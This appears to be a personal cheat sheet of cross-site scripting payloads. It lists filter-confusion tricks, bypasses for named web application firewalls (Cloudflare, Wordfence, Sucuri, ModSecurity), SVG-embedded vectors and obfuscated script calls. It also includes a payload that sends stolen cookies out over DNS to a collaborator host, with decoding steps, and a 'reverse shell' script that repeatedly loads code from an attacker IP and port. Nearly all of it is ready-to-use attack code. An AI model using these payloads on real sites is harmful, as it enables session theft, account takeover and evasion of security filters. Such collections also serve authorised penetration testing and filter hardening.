XSS

my-xss-diary.md

SVG animate XSS vector

• SVG animate XSS vector
• XSS CheatSheet
• Top 500
• xss account takeover

filter-confusing

<script>
x = '<!--<script>'/*</script>-->*/;alert(1)
</script>

Nice one by @stealthybugs

<svg onload="import('data:text/javascript,al'+''+'ert(0)')">

WAF bypass payload against Firefox

<image src\r\n=valid.jpg onloadend='new class extends (co\u006efir\u006d)/**/`` &lcub;&rcub;'>

More Cloudflare bypasses

<svg/onload=%26nbsp;alert`bohdan`+
1'"><img/src/onerror=.1|alert``>

<img src onerror=%26emsp;prompt`${document.domain}`>

Cookie theft over DNS while XSS

<script> document.location = "//" + btoa(document.cookie).replace(/[A-Z]/g, '$&.').replace(/=/g, 'X') + "I." + "YourBurpCollaborator"; </script>
Decode:
atob("Your_Receveived_DNS".replace(/(.)./g, (_,x)=>x.toUpperCase()))

WAF XSS Bypasses

Wordfence 7.4.2

<a href=&#01javascript:alert(1)>

Sucuri CloudProxy (POST only)

<a href=javascript&colon;confirm(1)>

ModSecurity CRS 3.2.0 PL1

<a href="jav%0Dascript&colon;alert(1)">

SVG-embedded payload by

<?xml version="1.0" standalone="no"?>
<svg viewBox="0 0 100 100" xmlns="http://w3.org/2000/svg">
  <a href="javascript&#9;:alert(1)">
    <circle cx="50" cy="40" r="35"/>
  </a>
</svg>

remote JS reverse shell payload

<script>setInterval(function(){d=document;z=d.createElement("script");z.src="//IP:PORT";d.body.appendChild(z)},0)</script>

WAF bypass payload by @rbidou

window[document.body.innerText.charAt(document.body.innerText.indexOf('a'))+'lert'](1)

WAF bypass payload by @JayateerthaG

<img src=something onauxclick="new Function `al\ert\`xss\``">

nice quoteless one by @stealthybugs

<svg id=javascript:alert(10) onload=location=id>